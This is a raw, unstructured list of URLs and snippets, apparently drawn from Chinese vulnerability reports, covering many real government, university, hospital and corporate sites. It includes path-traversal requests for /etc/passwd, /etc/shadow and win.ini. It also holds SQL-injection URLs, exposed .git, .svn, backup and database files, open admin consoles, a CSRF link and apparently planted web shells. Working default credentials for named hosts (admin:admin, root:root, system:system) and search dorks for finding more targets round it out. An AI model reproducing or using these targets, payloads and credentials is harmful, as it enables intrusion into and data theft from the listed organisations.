http://www.cmyl.edu.hk/php//updatepic/uploads/20130210000952175.JPG可看到图片。 http://222.243.207.19:8086/ http://222.243.207.19:8086/frame/ http://www.chinapnr.com/questionnaire.zip file:/D:/xampps/htdocs/questionnaire/result.php file:/D:/xampps/htdocs/questionnaire/questionnaire.php file:/D:/xampps/htdocs/questionnaire/lib/tools.php file:/D:/xampps/htdocs/questionnaire/js/area.js http://www.nysykfk.com/interflow_show.php?id=150 www.boco.com.cn/boco/cn/news_0.asp?id=1 www.boco.com.cn/boco/cn/xt_left.asp?comp=1 www.boco.com.cn/boco/cn/xt_news.asp?id=1 http://www.cae.com.cn/Default.aspx http://www.cae.com.cn/webfunction/customerinquiries/CusLogin.aspx http://www.cae.com.cn/webfunction/customerinquiries/CusLogin.aspx http://www.cae.com.cn/Default.aspx http://www.cae.com.cn/webfunction/customerinquiries/CusLogin.aspx http://www.cae.com.cn/webfunction/customerinquiries/CusLogin.aspx http://221.1.104.11:8011/OperateCertify/FamilyApplyAudit.aspx?id= http://221.2.171.59:8300/OperateCertify/FamilyApplyAudit.aspx?id= http://demo.inongyou.cn/OperateCertify/FamilyApplyAudit.aspx?id= http://rctdlz.cn/OperateCertify/FamilyApplyAudit.aspx?id= http://60.2.214.118:8088/OperateCertify/FamilyApplyAudit.aspx?id= http://121.17.2.52/OperateCertify/FamilyApplyAudit.aspx?id= http://61.186.154.210:8088/OperateCertify/FamilyApplyAudit.aspx?id= http://123.129.52.134/Login.aspx http://www.lygcs.gov.cn/xz.asp?classid=20 http://news.sohu.com/s2015/0010/s409336743/index.shtml http://yqgjzgs.com/gj/route_suggestion.asp?q=1 http://sci.cqvip.com//periodical/list.aspx?factor_max=e&factor_min=e&order=\&QKType=sciences&sciences=e http://www.lncy.lss.gov.cn/xzzq/xzzq.asp?id=1 http://www.venshop.com/download/ http://iss.ruc.edu.cn/voice_info.php?id=13 http://iss.ruc.edu.cn/events_info.php?id=21 http://cloudcomputing.ruc.edu.cn/Chinese/onlineresource.jsp?id=3 http://wjw.jining.gov.cn/admin/login.asp http://地址/..%5c..%5c..%5c/windows/win.ini http://**.**.**/jwgkweb/index!index.do http://open.sm.cn/index.php/open/qualify?cat_id=2 http://open.sm.cn/index.php/open/qualify?cat_id=2 www.ppkoo.com/server/upload.zip http://mrtg.ruc.edu.cn http://222.174.54.118:8088/ http://222.174.54.118:8088 password:bakuser1122 http://union.zhuna.cn/dujia/index.php?znsearch=&txtCity=%E5%8C%97%E4%BA%AC&cityId=0101&key=s gsi.big.ac.cn/news/bene/?id=1 http://118.193.211.239/c.html",故跟踪了一下网站看能不能拿到一些有用的信息。 http://www.travel.citic.com/shipList.jsp?shipid=1620 http://www.travel.citic.com/route_detail.jsp?routeid=201411240952 http://www.travel.citic.com/orderSuccess.jsp?routeid=201411240952 http://www.travel.citic.com/company.jsp?docid=001 http://www.travel.citic.com/enterprise_news_details.jsp?docid=6048 https://login.alibaba-inc.com登录是没什么用啦 http://www.anymacro.com/index.htm https://115.25.86.234/ https://115.25.86.236/ https://115.25.86.233/ https://115.25.86.235/ http://h.bilibili.com:80/.git/config http://www.rsc.zjut.edu.cn/rczp_detail.asp?id= https://xls.feiniu.com http://www.nysy.com.cn/qzly/qzlxlist.aspx?type=150 http://ecard.sdca.edu.cn//Index_main.aspx?NewsClassCode=1 http://sac.cumt.edu.cn/list.aspx?id=85 http://www.rucsau.com/index.php/site/viewText?id=153&checkId=152 istc.njtech.edu.cn/istc/index.php?controller=bookings&action=ajaxoption&id=1 https://sslvpn.faw.com.cn https://sslvpn.faw.com.cn/dana-na/auth/url_default/welcome.cgi http://222.73.228.40:8080/manager/clustermgr/login.jsp# http://tjdt.tbmmis.com/Login.aspx http://xls.feiniu.com/web/signin cloudcomputing.ruc.edu.cn/Chinese/problempage.jsp?id=1005 http://122.224.254.122:8000/Frame/Login.htm直接填写验证码可以进入后台 http://www.jiaofan.com/page.php?id=-1%20or%2018%20%3d%2016 http://www.xftech.com.cn/products.php?typeid=59&id=529 http://218.246.111.196:8088/ http://218.246.111.196:8088/UploadFile/635617024736037149.aspx http://www.casicedu.cn/front/info.php?infotype=1 http://jd.vsa.com.cn/seller_login.shtml http://jd.vsa.com.cn/test.txt https://mail.shenma-inc.com/ http://**.**.**/vote/admin/images/left/16683/index.html http://220.163.118.108/login_init.action http://www.ncwsj.cn/ http://www.xjjdls.com/sug.asp?info_kind=005 http://iss.ruc.edu.cn/events_info.php?id=20 http://111.30.45.123:8080/ http://111.30.45.123:8080/Index/Index)以外,其他页面似乎没有进行是否登录的判断。 http://111.30.45.123:8080/Index/User http://www.bld365.com/ http://www.bld365.com/ajax/getMemberInfo.action?temp=1426082592354 http://gyxfy.tcl.com/ http://gyxfy.tcl.com/admin/ Tel:027-87808981、87211102 http://218.29.94.8/etmdcp/为例 http://218.29.94.8/etmdcp/ http://admin.ibeiliao.com/.svn/entries http://admin.ibeiliao.com/printenv.cgi https://www.bugscan.net/ http://jftest.haier.com/manager/html admin:admin http://jftest.haier.com/wc2/cwd.jsp http://www.sj-hospital.org/ http://ihangjing.com/case/caselist.aspx www.4007123123.com www.faneat.com www.vtaoshi.com www.zainachi.com items:1:number items:1:age items:1:evicted items:1:evicted_nonzero items:1:evicted_time items:1:outofmemory items:1:tailrepairs items:1:reclaimed items:1:expired_unfetched items:1:evicted_unfetched items:2:number items:2:age items:2:evicted items:2:evicted_nonzero items:2:evicted_time items:2:outofmemory items:2:tailrepairs items:2:reclaimed items:2:expired_unfetched items:2:evicted_unfetched www.cqcgs.gov.cn/statistics/articleaction.jsparticleid=11563&articlename=%D6%D8%C7%EC%CA%D0%B9%AB%B0%B2%BE%D6%BD%BB%CD%A8%B9%DC%C0%ED%BE%D6%B3%B5%C1%BE%B9%DC%C0%ED%CB%F9%B9%D9%B7%BD%CE%A2%D0%C5 http://**.**.**/statistics/articleaction.jsparticleid=14300&articlename=%C4%C3%C1%CB%BC%DD%D5%D5%BB%B9%B2%BB%BB%E1%CD%A3%B3%B5%C8%EB%BF%E2%A3%BF%BF%B4%BF%B4%A1%B0%C0%EESIR%A1%B1%B5%C4%CD%A3%B3%B5%B9%A5%C2%D4_ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** https://cai.99bill.com https://pof.99bill.com https://ns5.99bill.com https://ns4.99bill.com https://bta.99bill.com https://maintenance2.99bill.com htp://sandbox.99bill.com:2443 http://sandbox.99bill.com:8002 http://sandbox.99bill.com:8445 http://appmaker.sinaapp.com/poc/com.letv.www/1.htm falsh:http://player.letvcdn.com/p/201501/30/11/StorageLetvPlayer.swf http://www.ycu.edu.cn/website/ intitle:MWMS4 http://42.156.166.30/cdn/index.php site:airchina.com.cn http://mp.airchina.com.cn:38443/MAGLIBv0.6/magserver/local/log/mag.log.2012-10-12.txt http://mp.airchina.com.cn:38443/MAGLIBv0.6/magserver/local/log/mag.log.2013-12-15.txt http://ip.9you.com/ http://lib.hrbeu.edu.cn/x/sy_tsjk_jj_yjfk.asp?id=243 http://lib.hrbeu.edu.cn/x/sy_tsjk_jj_yjfk.asp?id=243 http://sqlmap.org http://mall.95572.com/ http://mall.95572.com/index.php?act=member&op=show_order&order_id=18331 http://mall.95572.com/index.php?act=member&op=address&type=edit&id=5224 http://service.ltpop.gov.cn/Services.shtml http://service.hsrk.gov.cn/Services.shtml http://service.sqjs.gov.cn/Services.shtml http://service.zzxpop.gov.cn/Services.shtml http://service.ltjsj.gov.cn/Services.shtml http://service.zyxpop.gov.cn/Services.shtml http://service.akpop.gov.cn/Services.shtml http://service.zyxpop.gov.cn http://60.208.116.173:81/sjyoa/,扫描发现/general/二级目录下 http://60.208.116.173:81/sjyoa/general/说明.txt文件记载了部分目录地址,进一步扫描发现http://60.208.116.173:81/sjyoa/general/xtm/user/页面可增加、修改系统用户信息 http://60.208.116.173:81/sjyoa/general/zhxxxt/workersHome/zhxxxtGetDepartmentAction.action页面允许上传图片, http://192.168.2.99/bookReader.php http://elearning.corp.elong.com/ http://gz.oa.xdf.cn/mypromise/info.php?id=070828 http://219.136.133.169:10118/jpglweb/login.shtml http://219.136.133.169:10118/jpglweb/test.txt http://gaea.staff.xdf.cn/gaea/index.php/service/contract?sid=108&id=22&pid=69&type=3 http://gaea.staff.xdf.cn/gaea/index.php/service/products?sid=26&id=5 http://gaea.staff.xdf.cn/gaea/index.php/service/productPic?sid=108&id=22&pid=74&type=1 http://gaea.staff.xdf.cn/gaea/index.php/service/productInfo?sid=340&id=153&pid=76&type=2http://gaea.staff.xdf.cn/gaea/index.php/case/caseStudent?cid=65796&id=3&sid=83 http://gz-xinyuan.com/,先注册个会员 www.lnlyadsj.com http://www.lnlyadsj.com http://219.137.250.116:8082/ https://sandbox.99bill.com http://sandbox.99bill.com:9080 http://gdtj.chinasarft.gov.cn/chinasarftstainfofabu/LegendMap.aspx?areacode=000000&height=&id=1&width= http://se-office.ruc.edu.cn/cn/index.php?do=list&channelid=4094 http://scc.cau.edu.cn/scc/common/ http://zhushou.2345.com/index.php?c=boucheCheck&d=listFeedback&check=2&page=3 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.haczrc.com/myadmin/ http://www.sarft.gov.cn//WEB-INF/web.xml http://dsj.sarft.gov.cn//invoker/JMXInvokerServlet https://wx.abchina.com/WebSite/GetCreditBillListAct.ebf?openId=oHFX_jr_vrzeWhYD5tGWxNNtdug8&appId=wx51fdf61c0de4ab0b https://wx.abchina.com/WebSite/GetCreditBillTransInfoAct.ebf http://wx.api.dawenmedia.com/wxdw/register/bride http://wx.api.dawenmedia.com https://account.aliyun.com/login/login.htm?spm=a1z5k.7633538.0.0.DQgb7h&oauth_callback=https%3A%2F%2Fpassport.alibaba.com%2Fac%2Fto_iv.htm%3FfromSite%3D6 http://www.zzcrcgas.com http://218.28.4.60:8088/anquan_unit/list.aspx?sid=531 http://218.28.4.60:8088/news/download.aspx?filename=../../Fnews/download.aspx http://218.28.4.60:8088/anquan_unit/download.aspx?filename=../../anquan_unit/download.aspx http://www.zzcrcgas.com/page/form/zxjf.jsp http://ric.whu.edu.cn/Web/Login.aspx http://www.sunlands.com http://img.pipi.cn/imgupload/clientwww3/201502/03/20150203162921_744.jpg http://bms.ggjgnh.cn/loginAction.action www.hao123.com/?tn=94472661_hao_pg www.3600.com/?src=lm&ls=n431da8d38f www.2345.com/?k34511517 www.duba.com/?un_449343_1173 www.88488.com/?sign=rec|www.hao123.com/?tn=94472661_hao_pg hao123www.hao123.com/?tn=94472661_hao_pg|www.hao123.com/favicon.ico|0 gc.pipi.cn/desktop/zsglw1.html|afm.pipi.cn/pfup/zsg.ico|0 gc.pipi.cn/desktop/hazg1.html|www.pipi.cn/pfup/hazg2.ico|0 http://www.cyd818.com http://www.cyd818.com/abcmobile1/getCityByAbc_typeAndProvince.action https://github.com/yunlongmain/test/blob/a89d2c10603a155c62ed3dd6ae0385238813bc02/ci/application/controllers/mail.php http://kuaidadi.com/tax123_db_last.sql http://kuaidadi.com/admin/login.html http://119.147.224.147:8090/ www.szatlas.com.cn www.chinahzdani.com www.haotui.net www.fzcailiao.com http://pgzy.zjzs.net:8011/exam/gaokao2014/cjcx.aspx settings.asmx/getquestion http://210.21.119.232:8080/ http://bbs.ttyfund.com/uc_server/data/config.inc.php.bak http://user.ln.vnet.cn/aaa/portal/login.shtml http://user.ln.vnet.cn/aaa/test.txt http://oa.7651.com/ http://mp.toutiao.com http://www.oppo.com.cn/ http://oa.oppo.com.cn/xampp/ http://oa.oppo.com.cn/phpmyadmin/未授权访问 http://www.999netsafe.com:8010/fwjs/default/detail.jsp?sortid=1&fwjsid=8 http://www.999netsafe.com/news/default/defaultdetail.jsp?sortid=1&newsid=590 http://www.999netsafe.com/news/default/defaultdetail.jsp?sortid=1&newsid=590 http://www.999netsafe.com/news/default/defaultdetail.jsp?sortid=1&newsid=590 http://hbbsk.hbu.cn/tpi_18/sysasp/share/displaydatabase.asp?dbid=0&submittype=update&sysid=100 http://202.121.127.18/tpi_3/sysasp/share/displaydatabase.asp?dbid=0&submittype=update&sysid=100 http://202.120.82.49/tpi_8/sysasp/share/displaydatabase.asp?dbid=0&submittype=update&sysid=2000 http://oa.tjtc.edu.cn/zfoa/main.action http://58.49.91.221/zfoa/index.do http://oa.xynun.edu.cn/zfoa/index.do http://oa.zbnc.edu.cn/zfoa/index.do http://58.49.91.221/zfoa/index.do http://58.42.245.178/zfoa/index.do http://222.17.128.11:8065/zfoa/index.do http://220.201.218.10:8018 http://oa.nepu.edu.cn http://218.197.8.19:8018 http://218.26.1.82:13382/admin/login.jsp http://218.26.1.82:13382/admin/purview/user/inputRegister.action http://touch.acer.com.cn/web.rar http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://jn.66wch.com/MemberToLoginIgnore.action http://xx.66wch.com/MemberToLoginIgnore.action http://jn.66wch.com/MemberToLoginIgnore.action http://sh.66wch.com/MemberToLoginIgnore.action http://gd.66wch.com/MemberToLoginIgnore.action http://zj.66wch.com/MemberToLoginIgnore.action http://gz.66wch.com/MemberToLoginIgnore.action http://ln.66wch.com/MemberToLoginIgnore.action http://jn.84ke.com:8080/bus/showLine.action http://119.145.71.200/zy/login.shtml http://www.xcrc.gov.cn/News/ShowNews.asp?ID=1938 http://0745.hhly.gov.cn/eat.php?menuId=34 http://0745.hhly.gov.cn/live.php?menuId=35 http://0745.hhly.gov.cn/travel.php?menuId=39 http://0745.hhly.gov.cn/shop.php?menuId=37 http://0745.hhly.gov.cn/joy.php?menuId=36 http://0745.hhly.gov.cn/travel_xx.php?menuId=60 http://0745.hhly.gov.cn/newsTj.php?menuId=31 http://0745.hhly.gov.cn/panoramic.php?menuId=63 http://0745.hhly.gov.cn/live_xx.php?menuId=68 http://0745.hhly.gov.cn/eat_xx.php?menuId=43 http://0745.hhly.gov.cn/newsTj_xx.php?menuId=66 http://0745.hhly.gov.cn/shop_xx.php?menuId=55 http://0745.hhly.gov.cn/joy_xx.php?menuId=50 http://0745.hhly.gov.cn/news.php?menuId=4 http://0745.hhly.gov.cn/news_xx.php?menuId=5 http://cas.nwpu.edu.cn/cas/login?service=http%3A%2F%2Fportal.nwpu.edu.cn%2Fdcp%2Findex.jsp http://**.**.**/login.htm http://**.**.**/ http://v2014.rccms.com/person/resumelist.php?t=sideline&pnum= https://emts-web.huawei.com/emsweb/loginfrm.aspx http://www.7277.net/ http://www.xiangquanwan.net/manager/login.php http://www.nbrkb.net/manager/login.php http://www.sep-logistics.com/manager/login.php http://www.jade-glory.com/manager/login.php http://www.fynb0919.com/manager/login.php http://scrm.moxian.com/sys/memberAuthentication.mo http://www.smartcome.com/forum.php?mod=viewthread&tid=1%20union/*11%20*1*/select%201%20from%20dual--%201 http://211.144.217.230/elife/ http://t9.go2oa.com/t9/core/frame/webos/index.jsp http://passport.iqiyi.com/user/login.php http://t9.go2oa.com/t9/core/frame/webos/index.jsp http://t9.go2oa.com/t9/t9/core/funcs/email/act/T9EmailBoxAct/isBoxNameExist.act http://www.sccin.com.cn/AreaInfo/DownloadCenter/List.aspx?CategoryId=XZZX_CYBG http://msg.csdn.net/letters/send_message?receiver=jahnng&body=123 http://msg.csdn.net/letters/send_message?receiver=dahaozhao1&body=CSRF http://202.206.20.36/ http://**.**.**/Admin/login.jsp http://wooyun.org/bugs/wooyun-2015-097236/trace/2a26b4cb9b1a8797259f3b626e816abf http://www.tixa.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://www.tixa.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://www.tixa.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/httpd/conf/httpd.conf http://www.tgztb.gov.cn/admin/login.aspx http://58.215.138.213/phpmyadmin http://58.215.138.213/p.php root:root http://esales.sdo.com/ http://esales.sdo.com/Register/MobileRegister.aspx http://www.ciwong.com/xiyou/todaystar/gettodays http://58.215.138.183:9200/ http://58.215.138.183:8000/ http://www.jxnotary.org/showinfo.asp?id=288 http://wooyun.org/bugs/wooyun-2010-097032 http://zswin.cn/artc/144.html http://wooyun.org/bugs/wooyun-2010-097032 http://zswin.cn/artc/149.html http://www.0755sx.com/admin/login.asp www.jljj.gov.cn/admin/cms/login.do_ www.jljj.cn&x=76&y=1 http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://ehr.cofco.com/ http://down.chinaz.com/soft/25595.htm) inurl:zy.asp?m= http://jw.hnsfjy.net/ http://www.gycc.net/sjjd/ http://210.26.80.118/jpkc/shyj/ http://tw.lmu.cn/ http://www1.tyust.edu.cn/yuanxi/jsjg/ http://61.167.199.246/jmc/ http://jw.sasu.cn/ http://zx.sdningjin.gov.cn/ http://219.139.35.98:98/ http://vod.hy17173.com/film_new/ http://www.gsasny.com/ http://www.cnseay.com/3237/ http://www.maimaicha.com/api.php http://www.maimaicha.com/api.php http://www.dgrb.cn/uprove.aspx?code=529975924 system:system,后台不显示这个账户,试了搜索来的10个,全部中招。 system:system.用户大多是edu.cn,甚至包括ac.cn中科院。 http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://**.**.** http://**.**.**/f.txt_ http://**.**.**/f.txt_ http://**.**.**/f.txt_ http://**.**.**/f.txt http://www.xusoft09.cn http://www.aspjzy.com/Viewurl-12391.html) inurl:ReadBigClassmb.asp?id= http://www.ounengbei.com/WriteBook.asp http://www.hkhotel160.com/yuebing/WriteBook.asp http://www.shpsjj.com//WriteBook.asp http://cp01.cn//WriteBook.asp http://www.huaxiaxh.com//WriteBook.asp http://www.liyuanganguang.com//WriteBook.asp http://www.ybcnhd.com//WriteBook.asp http://www.kangjiayuan.cn//WriteBook.asp http://www.chuangjiexiaosha.com/WriteBook.asp http://www.szjpl168.com//WriteBook.asp http://www.5igwk.com/WriteBook.asp http://net.zetronic.com.cn/NetSMS/UpdateNetPassword.aspx?IsPopWnd=N&CertNo=要修改密码的身份证号&Tel=手机号码&IsStrongBindArea=N&IsNormalPwd=0&UnitCode=网吧编号 http://www.chinasunsoft.net/ inurl:7001/sanzi/ http://221.2.103.114:7001/sanzi/login.action http://218.92.50.202:7001/sanzi/llogin.action http://120.202.47.30:7001/sanzi/login.action http://124.228.32.53:7001/sanzi/login.action http://119.184.124.58:7001/sanzi/login.action http://121.10.6.181/ http://book.ifeng.com/ http://v.book.ifeng.com/shelf.htm?id=3034782 http://ser.read.ifeng.com/traffics/add_click.htm?b=3034782 http://safe.2345.com http://182.150.21.177:8080/jttgkpt/frame/loginAction!login.action https://www.lngmxx.com/ https://60.13.3.21/ https://58.42.250.234/ https://120.195.49.238/ https://124.163.249.126/ http://ucstar.jxlife.com.cn:9090/login.jsp http://ucstar.jxlife.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/passwd http://ucstar.jxlife.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/services www1.open.edu.cn/ycjy/jishu.php?id=195 https://github.com/Hankaln/moying/blob/68fa5c2ef88c68d1988bd1ad63ca3a0874219d4d/config/config.php http://bbs.eral.com.cn/space/ispace_friend.php?userid=181603 http://bbs.eral.com.cn/space/ispace_active.php?userid=181603 http://bbs.eral.com.cn/space/ispace.php?userid=181603 http://bbs.eral.com.cn/space/ispace_group.php?userid=181603 http://bbs.eral.com.cn/space/ispace_album.php?userid=181603 http://bbs.eral.com.cn/space/ispace_active_vote.phpuserid=181603&id=2697&actid=6 http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://www.hsufuchifoods.com/Contact.aspx?MenuID=001008001 http://sl.zhuna.cn/可以爆破用户名,首先爆破出chenjun用户存在,登陆密码为弱口令123456 http://skyrole.cn/ index.php/home/index/detail_meet system:system进入后台。 system:system这种。也有12+数字字母符号密码。。。。 http://www.51baishi.com/users!login.action http://www.51baishi.com/test.txt http://demo.51able.com http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://www.interotc.cn/lm/tzjDetail.do?id=700004 user:root pass:123456 http://218.106.175.241:9090/phpmyadmin/ url:http://www.wzstats.gov.cn:9089/ http://www.wzstats.gov.cn:9089/search.asp?VTI-GROUP=0¤tpage=1&look_for=%27&VTI-GROUP=1&which=0&imageField.x=28&imageField.y=11 VERSION:1.2.3 http://www.hhhtgzc.com/dyggg.asp?id=10 http://sggzccn.cnc506.000pc.net/dyggg.asp?id=11 http://www.kqgzc.com/dyggg.asp?id=1 http://www.erdostjgzc.com/dyggg.asp?id=40 http://www.kqgzc.com/dyggg.asp?id=40 http://117.79.80.23:8000使用了第三方程序,且存在注入。 http://117.79.80.23:8000/index.php?edition-compare http://bbs.gfan.com http://mail.chdmy.com.cn/ http://gaea.staff.xdf.cn/gaea/index.php/Hk/hkCase?sid=350&id=12&zy=Teaching%20English%20to%20Speakers%20of%20Other%20Languages http://www.donvieware.com:8085/servlet/vodsys.MovieInfor?id=950 http://125.88.124.147:8085/servlet/vodsys.MovieInfor?id=1074 http://121.10.252.178:8085/servlet/vodsys.MovieInfor?id=1014 http://61.189.240.78:8085/servlet/vodsys.MovieInfor?id=2659 http://www.donvieware.com:8085/servlet/vodsys.MovieInfor http://sqlmap.org http://moa.chinamobile.com/download/scripts/wapdetail2.php?project_code=gd&PF_CODE=01010400 http://114.251.196.23/web.rar http://www.sidp.gov.cn/2009/0708/4551.html http://stats.sidp.gov.cn/login.php http://project.sidp.gov.cn/login.php http://stats.sidp.gov.cn/login1.php http://202.85.223.10/进入瞬间浏览器的标题会看到阳光雨露helpdesk系统的字样有木有,不过之后就只显示helpdesk系统登录了 http://202.85.223.10:8080/jmx-console/居然进去了 http://homeinns.lms.ambow.net/login/userLogin.action http://www.cdtlgcxx.com:2110 http://jwmis.dzvtc.edu.cn http://jwgl.lynu.edu.cn http://220.167.53.63:81 http://jw.sxjgxy.edu.cn http://djyjw.sicau.edu.cn http:/m.rccms.com/person/index.php?t=ajax&keyword=&search_type=&btnArea=&id=963 http://t.cn/RZSiH28 http://182.151.210.179/login.jsp http://www.yishion.com.cn/detail.php?type=men&id=181 http://ehome.zte.com.cn/index.php?app=search&cate_id=1&page=1 www.cdxw.tv http://**.**.**/_ https://czk.bestpay.com.cn http://dfdjoa.dongfang.com/ user:admin pass:dongfang http://www.cae.com.cn/webfunction/webpage.aspx?nid=b12e467fdc9449fe820572fb895a94e2 https://github.com/zhaoshiling1017/JAVAMailProject/blob/6857a7f04b4573b7c132a935a4cadc122b8ece11/src/com/unicss/MailUtil.java academy.yonyou.com/ViewZsMap.aspx?order=z_products&name= http://mcm2.pc.e-health.org.cn/login/ssoLogin_login2.action http://battery.tcl.com/join.php?id=38 http://www.tzrc.cn/uploadpic.htm http://api.passport.pptv.com/dologin.do http://zyxw.tongji.edu.cn/TJPDSYS/InfoDetail.jsp?titleID=731 http://**.**.**/_ http://124.165.218.68/Venus/login/default.asp http://www.zdsoft.net/ http://www.zdsoft.net/moreinfo.aspx?layoutTemplateId=1201&bigClassId=266571 www.tzrc.com http://yy.xmfybj.cn/123.asp http://yy.xmfybj.cn/fd.asp http://yy.xmfybj.cn/kmd.asp;kmd.txt http://yy.xmfybj.cn/asp.aspx http://yy.xmfybj.cn/feiduan.asp http://yy.xmfybj.cn/ccc.asp http://yy.xmfybj.cn/ce.asp http://www.zjqhyy.com/cms/KSLB.aspx?LMID=16 http://ywzxyy.com/cms/KSLB.ASPX?LMID=13 http://www.ksskfyy.com/cms/KSLB.aspx?LMID=916 http://www.hnzyy.cn/cms/KSLB.aspx?LMID=52 http://www.ks2y.com/cms/KSLB.aspx?LMID=25 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.ks2y.com/cms/ks.aspx?wwksid=108&lb=0&lmid=25 http://www.zjkq.com.cn/cms/KS.aspx?wwksid=99&lb=0&lmid=25 http://www.fysrmyy.com/cms/ks.aspx?wwksid=210&lb=0 http://www.zjqhyy.com/cms/ks.aspx?wwksid=87&lb=0&LMID=16 http://www.hnzyy.cn/cms/ks.aspx?wwksid=300&lb=1 http://www.zjqhyy.com/cms/RY.aspx?ryid=198&ssjs=1&LMID=74 http://ywzxyy.com/cms/RY.aspx?ryid=128&ssjs=1 http://www.hnzyy.cn/cms/RY.aspx?ryid=749&ssjs=1&LMID=117 http://www.fysrmyy.com/cms/RY.aspx?ryid=633&ssjs=3 http://www.ks2y.com/cms/RY.aspx?ryid=264&ssjs=1&lmid=69 http://t1.fanwe.net http://www.zxgy.gov.cn/info/shy.asp?ClassID=22 http://www.zxgy.gov.cn/info/Admin_Index.asp http://ly.fanwe.com/ http://v2014.rccms.com http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.workyi.com/ http://www.0745gz.com/ http://180.166.10.92/ http://221.1.104.11:8011/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://221.1.104.11:8011/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://221.2.171.59:8300/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://221.2.171.59:8300/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://demo.inongyou.cn/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://demo.inongyou.cn/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://rctdlz.cn/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://rctdlz.cn/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://60.2.214.118:8088/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://60.2.214.118:8088/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://121.17.2.52/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://121.17.2.52/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://61.186.154.210:8088/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://61.186.154.210:8088/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://mall.iqiyi.com/ www.arts.cuhk.edu.hk/~music/en/people_detail.php?cid=12 http://wenku.baidu.com/view/7aeeb69e195f312b3069a53f.html https://wch.cdpc.chinacdc.cn:8443/FY/login.do http://59.61.215.122:8888/yyoa/index.jsp http://mpa.xmu.edu.cn/App/Frame/index.php/Home/col/colid/16 http://58.56.98.98/search.aspx http://**.**.**/ly/_ http://www.tutuapp.com/photo/.svn/entries http://www.tutuapp.com/images/.svn/entries http://www.tutuapp.com/app/.svn/entries http://www.tutuapp.com/js/.svn/entries http://www.tutuapp.com/style/.svn/entries http://www.tutuapp.com/api/.svn/entries http://www.tutuapp.com/validateCode/.svn/entries https://github.com/zhmch/billing/blob/ce5bc9feec6ef84e7c3bef6ee75d44aff1f0527e/src/main/java/com/funguide/billing/Constant.java http://**.**.**/svn/pingan/server/pingan/palottery/ http://**.**.**/svn/pingan/server/pingan/palotsys/ http://**.**.**/svn/E_live/_ huafei.funguide.com.cn/admin_login_ www.funguide.com.cn/LifePaymentMSNew/_ www.funguide.com.cn/violationsdrivecar/_ www.funguide.com.cn:8080/palotsys/_ www.funguide.com.cn/fgpay/admin/login_ http://demo.foosun.net/foosun500/ http://demo.foosun.net/Foosun500/FS/LYB/ http://www.29029.com http://www.29029.com/oa/?lm=19 http://www.29029.com/oa/?lm=19 http://www.29029.com/oa/?m=s1&sql=42&mc=1 http://www.mixiao.com/oa/?lm=3 http://www.bcyxx.com/oa/?lm=3 http://www.cjlxx.com/oa/?lm=49 http://www.bssnzxx.com/oa/?lm=71 http://www.cztsxx.cn/oa/?lm=467 http://www.shgj2x.com/oa/?lm=102 